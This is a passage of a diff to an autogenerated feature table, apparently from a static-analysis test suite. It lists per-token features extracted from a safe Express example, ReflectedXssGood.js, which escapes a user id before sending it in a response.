autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:11 | express | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express ... press') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:5:2:32 | express ... press') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:21 | require | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:21 | require | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | exceptional return of require('express') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | exceptional return of require('express') | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | require('express') | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:15:2:32 | require('express') | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | calleeImports | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:2:23:2:31 | 'express' | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:7 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:7 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:7 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app = express() | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app = express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:5:4:19 | app = express() | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:17 | express | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:17 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:17 | express | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | exceptional return of express() | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | exceptional return of express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | exceptional return of express() | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | express() | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | express() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:4:11:4:19 | express() | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:3 | app | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:3 | app | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:7 | app.get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:6:7 | app.get | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | app.get ... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | exceptional return of app.get ... ;\\n}) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | exceptional return of app.get ... ;\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:1:13:2 | exceptional return of app.get ... ;\\n}) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:5:6:7 | get | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:5:6:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:5:6:7 | get | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | calleeImports | express | @@ -21018,6 +140250,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:9:6:19 | '/user/:id' | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | escape | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | escape | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | escape | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | escape | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | escape | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | this | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | this | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:6:21 | this | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | 'arguments' object of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | exceptional return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | exceptional return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | exceptional return of anonymous function | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | calleeImports | express | @@ -21025,6 +140277,102 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | functio ... ;\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | return of anonymous function | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | return of anonymous function | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:22:13:1 | return of anonymous function | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:31:6:33 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:6:36:6:38 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:7:7:35 | !isVali ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:7:7:35 | !isVali ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:7:7:35 | !isVali ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:7:7:35 | !isVali ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:7:7:35 | !isVali ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:20 | isValidUserId | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:20 | isValidUserId | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:20 | isValidUserId | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:20 | isValidUserId | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:20 | isValidUserId | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | exceptional return of isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | exceptional return of isValid ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | exceptional return of isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | exceptional return of isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | exceptional return of isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | isValid ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | isValid ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | isValid ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | isValid ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:8:7:35 | isValid ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:24 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:24 | req | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:24 | req | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:31 | req.params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:31 | req.params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:22:7:31 | req.params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:26:7:31 | params | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:26:7:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:26:7:31 | params | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:26:7:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:26:7:31 | params | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:33:7:34 | id | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:33:7:34 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:33:7:34 | id | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:33:7:34 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:7:33:7:34 | id | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:7 | res | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:7 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:7 | res | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:7 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:7 | res | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:12 | res.send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:12 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:12 | res.send | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:12 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:12 | res.send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | exceptional return of res.sen ... ms.id)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | exceptional return of res.sen ... ms.id)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | exceptional return of res.sen ... ms.id)) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | exceptional return of res.sen ... ms.id)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | exceptional return of res.sen ... ms.id)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | res.sen ... ms.id)) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | res.sen ... ms.id)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | res.sen ... ms.id)) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | res.sen ... ms.id)) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:5:9:54 | res.sen ... ms.id)) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:9:9:12 | send | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:9:9:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:9:9:12 | send | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:9:9:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:9:9:12 | send | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:29 | "Unknown user: " | stringConcatenatedWith | -endpoint- escape() | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | @@ -21033,6 +140381,57 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | fileImports | escape-html express | | autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:14:9:53 | "Unknow ... ams.id) | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:38 | escape | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:38 | escape | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:38 | escape | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:38 | escape | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:38 | escape | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | escape( ... ams.id) | stringConcatenatedWith | 'Unknown user: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | exceptional return of escape( ... ams.id) | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | exceptional return of escape( ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | exceptional return of escape( ... ams.id) | enclosingFunctionBody | req res isValidUserId req params id res send Unknown user: escape req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | exceptional return of escape( ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:33:9:53 | exceptional return of escape( ... ams.id) | fileImports | escape-html express | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:42 | req | contextFunctionInterfaces | escapeHtml1(str)\nescapeHtml2(string)\ntextContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssGood.js:9:40:9:42 | req | 